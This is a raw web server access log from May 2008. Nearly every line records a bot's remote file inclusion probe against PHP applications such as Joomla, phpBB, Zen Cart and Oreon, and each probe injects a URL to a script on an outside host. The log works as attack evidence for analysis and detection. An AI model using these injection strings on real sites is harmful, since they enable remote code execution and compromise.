222.236.47.176 - - [16/May/2008:09:00:02 -0700] "GET /logs/access_080131.log/displayCategory.php?adminpath=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:00:12 -0700] "GET /retreat1/webcam/retreat1_00042.jpg HTTP/1.1" 200 33813 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:00:13 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:00:15 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:00:18 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:00:18 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/id2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:00:18 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/id2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:00:19 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:00:32 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:09:00:34 -0700] "GET /logs/scanhttp://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:09:00:34 -0700] "GET /scanhttp://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:00:38 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:00:39 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:09:00:44 -0700] "GET /logs/scanhttp://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:09:00:45 -0700] "GET /scanhttp://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:00:46 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/arab.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.65" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:00:48 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://lab.matrixl.net/id.txt?? HTTP/1.1" 200 4140 "-" "libwww-perl/5.811" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:00:54 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:01:03 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.160.78.135 - - [16/May/2008:09:01:04 -0700] "GET /logs/access_080327.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.suryamassage.nl/suryamassage/images/stories/food/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:01:07 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
212.84.34.22 - - [16/May/2008:09:01:07 -0700] "GET /logs//update/update2.php?lang=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.84.34.22 - - [16/May/2008:09:01:07 -0700] "GET //update/update2.php?lang=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:01:08 -0700] "GET /retreat1/webcam/retreat1_00046.jpg HTTP/1.1" 200 33748 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:09:01:08 -0700] "GET //update/update1.php?lang=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:09:01:08 -0700] "GET /logs//update/update1.php?lang=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:01:09 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:01:09 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.230.76.181 - - [16/May/2008:09:01:13 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.76.181 - - [16/May/2008:09:01:13 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:01:16 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:01:16 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:01:17 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:01:25 -0700] "GET /logs/access_080120.log//skin/zero_vote/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.141.102.51 - - [16/May/2008:09:01:27 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:01:27 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.34.226.154 - - [16/May/2008:09:01:45 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.34.226.154 - - [16/May/2008:09:01:45 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:01:48 -0700] "GET /logs/access_080220.log//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:09:01:55 -0700] "GET /logs/access_080225.log//displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:09:02:00 -0700] "GET //displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:02:01 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:02:03 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:02:03 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:02:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:02:05 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:09:02:06 -0700] "GET /logs//displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:02:09 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
150.187.25.20 - - [16/May/2008:09:02:24 -0700] "GET //claroline/auth/ldap/authldap.php?includePath=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:02:37 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:02:37 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:09:03:16 -0700] "GET /logs/scanhttp://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:09:03:16 -0700] "GET /scanhttp://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:03:57 -0700] "GET /logs/access_080221.log/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:03:58 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.177.96.168 - - [16/May/2008:09:04:00 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.177.96.168 - - [16/May/2008:09:04:00 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:04:07 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:09:04:32 -0700] "GET /logs/access_080209.log//displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.212.199 - - [16/May/2008:09:04:59 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.107.130.4 - - [16/May/2008:09:05:06 -0700] "GET /logs//update/update3.php?lang=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.107.130.4 - - [16/May/2008:09:05:07 -0700] "GET //update/update3.php?lang=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:05:33 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.148.178 - - [16/May/2008:09:05:39 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:06:02 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:06:05 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:06:10 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/arab.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:06:29 -0700] "GET /logs/access_080120.log/includes/kb_constants.php?module_root_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:07:02 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.203.223.45 - - [16/May/2008:09:07:07 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
213.203.223.45 - - [16/May/2008:09:07:07 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:07:07 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.2knowit.net/id2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.133.2 - - [16/May/2008:09:07:30 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.42.133.2 - - [16/May/2008:09:07:30 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
195.155.232.37 - - [16/May/2008:09:07:51 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [16/May/2008:09:07:51 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:08:08 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:08:08 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:08:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
151.11.24.250 - - [16/May/2008:09:08:16 -0700] "GET /logs/portfolio/commentaires/derniers_commentaires.php?rep=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:09:08:21 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:09:08:22 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:09:08:22 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:08:22 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:09:08:22 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:09:08:22 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:08:22 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:08:22 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:09:08:22 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.190.223.174 - - [16/May/2008:09:08:25 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.190.223.174 - - [16/May/2008:09:08:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:08:28 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:08:28 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:08:28 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:08:32 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.190.223.174 - - [16/May/2008:09:08:41 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.190.223.174 - - [16/May/2008:09:08:41 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:08:46 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:08:49 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:08:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:08:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:08:52 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.44.51.253 - - [16/May/2008:09:08:54 -0700] "GET /logs/access.log HTTP/1.1" 200 22006 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.dmulk.com"
89.111.176.114 - - [16/May/2008:09:09:12 -0700] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.114 - - [16/May/2008:09:09:13 -0700] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.115.228.135 - - [16/May/2008:09:09:22 -0700] "GET /logs/access_080109.log//common.inc.php?base_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.135 - - [16/May/2008:09:09:23 -0700] "GET //common.inc.php?base_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.135 - - [16/May/2008:09:09:23 -0700] "GET /logs//common.inc.php?base_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:09:25 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:09:09:27 -0700] "GET /scanhttp://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:09:29 -0700] "GET /logs/access_080327.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:09:09:50 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:09:09:50 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:09:52 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.135 - - [16/May/2008:09:09:53 -0700] "GET /logs/access_080128.log//common.inc.php?base_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:09:53 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:09:53 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:09:54 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:09:54 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
